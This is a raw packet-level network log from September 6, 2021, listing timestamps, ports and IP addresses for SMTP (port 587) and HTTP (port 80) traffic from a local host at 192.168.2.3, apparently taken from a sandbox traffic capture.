Sep 6, 2021 11:22:25.838182926 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.838208914 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.838224888 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.838238001 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.838249922 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.838260889 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.838273048 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.838381052 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.838392973 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.839365005 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.839381933 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.839390039 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.839981079 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.839993954 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.843867064 CEST | 80 | 49712 | 104.16.154.36 | 192.168.2.3
Sep 6, 2021 11:22:25.844686985 CEST | 49712 | 80 | 192.168.2.3 | 104.16.154.36
Sep 6, 2021 11:22:25.848732948 CEST | 49712 | 80 | 192.168.2.3 | 104.16.154.36
Sep 6, 2021 11:22:25.867901087 CEST | 80 | 49712 | 104.16.154.36 | 192.168.2.3
Sep 6, 2021 11:22:25.883661032 CEST | 80 | 49712 | 104.16.154.36 | 192.168.2.3
Sep 6, 2021 11:22:25.885644913 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.885663033 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.885756016 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.885767937 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.893414974 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.893431902 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.893440008 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.893451929 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.893459082 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:26.018726110 CEST | 49712 | 80 | 192.168.2.3 | 104.16.154.36
Sep 6, 2021 11:22:26.288820982 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:26.378110886 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:30.435049057 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:33.822968960 CEST | 49715 | 80 | 192.168.2.3 | 104.16.154.36
Sep 6, 2021 11:22:33.840420008 CEST | 80 | 49715 | 104.16.154.36 | 192.168.2.3
Sep 6, 2021 11:22:33.840538025 CEST | 49715 | 80 | 192.168.2.3 | 104.16.154.36
Sep 6, 2021 11:22:33.865338087 CEST | 49715 | 80 | 192.168.2.3 | 104.16.154.36
Sep 6, 2021 11:22:33.882292986 CEST | 80 | 49715 | 104.16.154.36 | 192.168.2.3
Sep 6, 2021 11:22:33.904181004 CEST | 80 | 49715 | 104.16.154.36 | 192.168.2.3
Sep 6, 2021 11:22:34.019366980 CEST | 49715 | 80 | 192.168.2.3 | 104.16.154.36
Sep 6, 2021 11:22:35.246567965 CEST | 49715 | 80 | 192.168.2.3 | 104.16.154.36
                                                                    Sep 6, 2021 11:22:35.264852047 CEST8049715104.16.154.36192.168.2.3
                                                                    Sep 6, 2021 11:22:35.264933109 CEST4971580192.168.2.3104.16.154.36
                                                                    Sep 6, 2021 11:22:35.374589920 CEST49718587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:35.426176071 CEST5874971894.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:35.426295042 CEST49718587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:35.477663994 CEST5874971894.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:35.564328909 CEST49718587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:35.582390070 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:35.616698027 CEST5874971894.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:35.616727114 CEST5874971894.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:35.617120028 CEST49718587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:35.635914087 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:35.636023998 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:35.668801069 CEST5874971894.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:35.688143015 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:35.689376116 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:35.741548061 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:35.741569996 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:35.741786003 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:35.769534111 CEST49718587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:35.794620991 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:35.876379967 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:35.934660912 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:35.934695005 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:35.934714079 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:35.934820890 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:35.938261032 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:35.993257999 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.077516079 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.115361929 CEST49718587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.131409883 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.132081985 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.171513081 CEST5874971894.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.171540976 CEST5874971894.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.171559095 CEST5874971894.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.171710014 CEST49718587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.174925089 CEST49718587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.185811996 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.186161995 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.228774071 CEST5874971894.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.269543886 CEST49718587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.279863119 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.340301037 CEST49718587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.392014027 CEST5874971894.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.413218021 CEST49718587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.466974974 CEST5874971894.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.506906033 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.512660027 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.525788069 CEST49718587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.565030098 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.565429926 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.565891981 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.617404938 CEST5874971894.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.618473053 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.618876934 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.682126999 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.683274984 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.683459044 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.683656931 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.683873892 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.683976889 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.684058905 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.684168100 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.684252024 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.684355021 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.684427977 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.684515953 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.684588909 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.684675932 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.684755087 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.684840918 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.722856045 CEST5874971894.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.736816883 CEST49718587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.738883018 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.738931894 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.738961935 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.738986015 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.739012003 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.739059925 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.739094973 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.739825010 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.739859104 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.739883900 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.739978075 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.740015984 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.788324118 CEST5874971894.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.788952112 CEST5874971894.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.789427996 CEST49718587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.792145967 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.792179108 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.792203903 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.792251110 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.792273998 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.792308092 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.792347908 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.792365074 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.793109894 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.793138981 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.793241024 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.793301105 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.793420076 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.793951988 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.794101954 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.794132948 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.794164896 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.815005064 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.815193892 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.815264940 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.815396070 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.815500021 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.815598965 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.815699100 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.815784931 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.815893888 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.815972090 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.816062927 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.816147089 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.816237926 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.816317081 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.816423893 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.841564894 CEST5874971894.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.845598936 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.845628023 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.845663071 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.845752001 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.845797062 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.845871925 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.845911980 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.846101046 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.846139908 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.846223116 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.846338034 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.846456051 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.846492052 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.846513033 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.846543074 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.846623898 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.846724033 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.846816063 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.846925974 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.847022057 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.847105980 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.847184896 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.847265005 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.847311020 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.847347975 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.847624063 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.847907066 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.848056078 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.848134995 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.848215103 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.848300934 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.848377943 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.848463058 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.848540068 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.848627090 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.848737955 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.848814011 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.848907948 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.848987103 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.849076033 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.849165916 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.849617958 CEST49718587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.867964029 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.868823051 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.868967056 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.868992090 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.869112968 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.869200945 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.869286060 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.869363070 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.869445086 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.869605064 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.869678974 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.869779110 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.869857073 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.869942904 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.870021105 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.870101929 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.870184898 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.899192095 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.899244070 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.899269104 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.899303913 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.899384022 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.899435997 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.899554968 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.899580002 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.899732113 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.899754047 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.899792910 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.899837971 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.899935007 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.900013924 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.900121927 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.900202990 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.900300980 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.900381088 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.900477886 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.900557995 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.900670052 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.900681019 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.900758028 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.900768042 CEST49719587192.168.2.394.100.180.160
Sep 6, 2021 11:22:36.900795937 CEST | 587 | 49719 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:36.900820971 CEST | 587 | 49719 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:36.900846004 CEST | 587 | 49719 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:36.900913000 CEST | 49719 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:36.901012897 CEST | 49719 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:36.901081085 CEST | 49719 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:36.901140928 CEST | 49719 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:36.901736975 CEST | 587 | 49719 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:36.901762962 CEST | 587 | 49719 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:36.901789904 CEST | 587 | 49719 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:36.901817083 CEST | 587 | 49719 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:36.901840925 CEST | 587 | 49719 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:36.902132988 CEST | 587 | 49719 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:36.910782099 CEST | 587 | 49718 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:36.911639929 CEST | 49718 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:36.911823988 CEST | 49718 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:36.911921978 CEST | 49718 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:36.912004948 CEST | 49718 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:36.921364069 CEST | 587 | 49719 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:36.921394110 CEST | 587 | 49719 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:36.921411991 CEST | 587 | 49719 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:36.921952009 CEST | 587 | 49719 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:36.922024012 CEST | 587 | 49719 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:36.922049046 CEST | 587 | 49719 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:36.923063040 CEST | 587 | 49719 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:36.954035044 CEST | 587 | 49719 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:36.954077005 CEST | 587 | 49719 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:36.954116106 CEST | 587 | 49719 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:36.964442968 CEST | 587 | 49718 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:36.964488029 CEST | 587 | 49718 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:36.993927956 CEST | 587 | 49719 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:37.275638103 CEST | 587 | 49719 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:37.379040956 CEST | 49719 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:37.413528919 CEST | 587 | 49718 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:37.504878044 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:37.556991100 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:37.557118893 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:37.582137108 CEST | 49718 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:37.609016895 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:37.609217882 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:37.660394907 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:37.660432100 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:37.660605907 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:37.713546038 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:37.713942051 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:37.769697905 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:37.769757032 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:37.769773960 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:37.769799948 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:37.771982908 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:37.824224949 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:37.825762033 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:37.877695084 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:37.878128052 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:37.929764986 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:37.930159092 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.021209955 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.093187094 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.094758034 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.145941019 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.146482944 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.146831036 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.198268890 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.198623896 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.261121988 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.281377077 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.287504911 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.287806988 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.288233995 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.288584948 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
